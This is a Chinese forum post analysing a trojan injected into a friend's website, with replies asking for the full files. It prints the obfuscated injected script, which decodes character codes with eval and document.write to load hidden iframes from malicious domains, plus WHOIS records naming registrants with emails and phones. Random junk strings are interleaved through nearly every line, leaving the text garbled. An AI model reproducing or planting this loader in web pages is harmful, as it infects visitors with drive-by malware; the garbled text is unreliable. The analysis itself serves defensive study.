[原创]一篇刚写的分析木马手记

首发在我的博客里面， ?Tc#[B  
>NBc-DX^  
http://www.areway.cn/?p=175 3@I0j/1#k1  
/>S^`KSTM  
-j3Lgm  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： CK7([>2  
          xUdGSr50  
<script>t=’60,105,102,114,97,109,101, wli cuY?  
32,115,114,99,61,104,116,116,112,58,47,47, JLE&nbKS  
102,114,101,101,46,117,45,117,117,117,46,99, =NtHV4=b  
110,47,101,114,114,111,114,46,104,116,109, JPqd}:u3  
32,119,105,100,116,104,61,49,48,48,32,104, %, psUOY  
101,105,103,104,116,61,48,62,60,47,105,102, +-@n}xb@  
114,97,109,101,62′; =Pl@+RgK+  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> !
#)t<9]fv  
                                                                                                  ]!/U9"_e"B  
<script>t=’60,105,102,114,97,109,101,32,115, 1p.c6[9-  
114,99,61,104,116,116,112,58,47,47,102,114, QgqJ #  
101,101,46,117,45,117,117,117,46,99,110,47, 8D )nM|  
101,114,114,111,114,46,104,116,109,32,119, C>+n>bH]L  
105,100,116,104,61,49,48,48,32,104,101,105, ,~d0R4)  
103,104,116,61,48,62,60,47,105,102,114,97, N@c GjpQ  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); +-<G(^  
document.write(t);</script> <}RI<96  
                                                                                                  g{yw&q[B=  
<html xmlns=” 5)%ahmY  
http://www.w3.org/1999/xhtml $v@$C
4  
“> 7{F\b  
<head> R!j#  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> OZxJDg  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> @.W;3|~qc  
<title>首页 - 爱生活家庭网
 B(;MI`  
                                                                                                                                                    5I2,za&e  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 src9EeiV  
转换字符串后的大概内容是（谁点击后果自付）： oFU:]+.+D  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… WVa%<  
                                                                                                                                  = J;I5:J  
查询玉米u-uuu.cn的详细信息： x 7by|G(  
Domain Name: u-uuu.cn z{L'7  
ROID: 20070901s10001s64972306-cn 4{uQ}ea  
Domain Status: ok =-si| 1Z  
Registrant Organization: 王雷 Nbpn"*L,  
Registrant Name: 王雷 dBXiLrEbs  
Administrative Email: czlovexs@126.com 05LkLB  
Sponsoring Registrar: 北京万网志成科技有限公司 n=<c_a)Nb  
Name Server:ns.yovole.com K<J,n!zc  
Name Server:ns1.yovole.com #BLHHK/[  
Registration Date: 2007-09-01 17:54 AZ3T#f![L@  
Expiration Date: 2008-09-01 17:54 i=Qy?aU?  
最后PING了一下地址 都没有什么…. '8;bc@cE  
                                                                                                xvO
z*vM?  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. {^dq7!  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> U4!KO;Jc  
<script language=”javascript” src=” xfb .Z(  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script G+<XYkz*  
> uBRlvNJ  
这个玉米应该有可能是木马作者的： _c>ww<*3  
foafau.info的详细信息： B r#{  
Access to INFO WHOIS information is provided to assist persons in be8T<F  
determining the contents of a domain name registration record in the 0/su`  
Afilias registry database. The data in this record is provided by yI: ;+K  
Afilias Limited for informational purposes only, and Afilias does not qf x*a88  
guarantee its accuracy.  This service is intended only for query-based sGu.G  
access. You agree that you will use this data only for lawful purposes 0&,D&y%  
and that, under no circumstances will you use this data to: (a) allow, hQ@k|3=Re  
enable, or otherwise support the transmission by e-mail, telephone, or t.9s49P  
facsimile of mass unsolicited, commercial advertising or solicitations (.:*GUg  
to entities other than the data recipient’s own existing customers; or A]|w1nq  
(b) enable high volume, automated, electronic processes that send O-V|=t  
queries or data to the systems of Registry Operator, a Registrar, or DPT6]pl"y  
Afilias except as reasonably necessary to register domain names or O{l4 f:51  
modify existing registrations. All rights reserved. Afilias reserves BXYHJ
  
the right to modify these terms at any time. By submitting this query, sQ}|Lu9hZ  
you agree to abide by this policy. Ah2 {kK  
Domain ID:D22418703-LRMS _2jL]mB  
Domain Name:FOAFAU.INFO PB@IPnB-  
Created On:20-Nov-2007 16:05:42 UTC Q6HJ+H-Ub  
Last Updated On:20-Nov-2007 16:05:44 UTC N\PdX$  
Expiration Date:20-Nov-2008 16:05:42 UTC "/zgh  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) b{<?E };%  
Status:CLIENT DELETE PROHIBITED qYA~Os1e  
Status:CLIENT RENEW PROHIBITED ZHNL~=r}  
Status:CLIENT TRANSFER PROHIBITED |P>
7C  
Status:CLIENT UPDATE PROHIBITED ,MXU]{  
Status:TRANSFER PROHIBITED T<B}Z11R  
Registrant ID:GODA-040110615 4QA~@pBX^{  
Registrant Name:liu hong !_
W/p`Tc  
Registrant Organization: s/7Z.\  
Registrant Street1:beijing =%m{|HQ`  
Registrant Street2: J#$U<`j*G  
Registrant Street3: ^bv^&V&IB  
Registrant City:beijing 3jAr"xc  
Registrant State/Province: O t)}:oG  
Registrant Postal Code:100000 X84T F~2Y  
Registrant Country:CN =cEsv&i  
Registrant Phone:+86.860108888777 ~M}{rl.n=  
Registrant Phone Ext.: }b\hRy~=r  
Registrant FAX: "-=fi 'D  
Registrant FAX Ext.: =Dq&lm,n  
Registrant Email:bbbshiji@163.com ^m#tWb)f  
Admin ID:GODA-240110615 T[SK>z  
Admin Name:liu hong )h}IZSm  
Admin Organization: *S}@DoXS  
Admin Street1:beijing  T01Iu  
Admin Street2: OIPY,cj~  
Admin Street3: x-[ItJ% l  
Admin City:beijing hS,&Nj+  
Admin State/Province: xF[%R{Mn'  
Admin Postal Code:100000 mXz*Gi  
Admin Country:CN `6~0W5  
Admin Phone:+86.860108888777 uHKEt[PS$  
Admin Phone Ext.: *a Z1 4  
Admin FAX: U823q-x  
Admin FAX Ext.: M8~3 0L  
Admin Email:bbbshiji@163.com FaeKDbLJr  
Billing ID:GODA-340110615 9vV==A#  
Billing Name:liu hong vaB ql(?'2  
Billing Organization: 4 . 7X*1  
Billing Street1:beijing / dJz?0  
Billing Street2: hVF^"$  
Billing Street3: 3:iEt (iCI  
Billing City:beijing S"&Gutu3o  
Billing State/Province: |,$&jSe  
Billing Postal Code:100000 #Nh'1@@  
Billing Country:CN b$b;^nly  
Billing Phone:+86.860108888777 bA)nWWSg=  
Billing Phone Ext.: J1G}l5N  
Billing FAX: AIg4u(j  
Billing FAX Ext.: %D4)Bqr  
Billing Email:bbbshiji@163.com dL$ iTSfz"  
Tech ID:GODA-140110615 q}t]lD %C  
Tech Name:liu hong GTR*3,rw  
Tech Organization: d^=)n-!T  
Tech Street1:beijing tu}!:5xi  
Tech Street2: }i8y/CA  
Tech Street3: #^L&H oo6  
Tech City:beijing ^s{Ff+]W  
Tech State/Province: k;^$Pd?t  
Tech Postal Code:100000 Uoe{,4T  
Tech Country:CN 4:/V
|E\D  
Tech Phone:+86.860108888777 _{jC?rzb  
Tech Phone Ext.: Z^>4qf,k  
Tech FAX: (X "J)xaQ  
Tech FAX Ext.: hP)Zm%@0f  
Tech Email:bbbshiji@163.com 'V?FeWp  
Name Server:NS27.DOMAINCONTROL.COM 9qftMDLZJ\  
Name Server:NS28.DOMAINCONTROL.COM 9295:Y| w1  
Name Server: DC h !Z{I  
Name Server: c]uieig0~  
Name Server: tpGT~Y(  
Name Server: }[akj8U  
Name Server: #KiJ{w'  
Name Server: gO8d2?Oh  
Name Server: BzfR8mD  
Name Server: _ dAyw  
Name Server: $BdwKk !k  
Name Server: 23tX"e  
Name Server: _z#"BN  
                                                                                                         
~3.*b%,  
接着下载每个文件里面的代码： M[`[+5v  
一步一步看.. A&M_ 
J  
_3aE]\O[  
Ca0s
m  
`$/a-K}  
2jyWkAP'  
f0H.$UAL  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来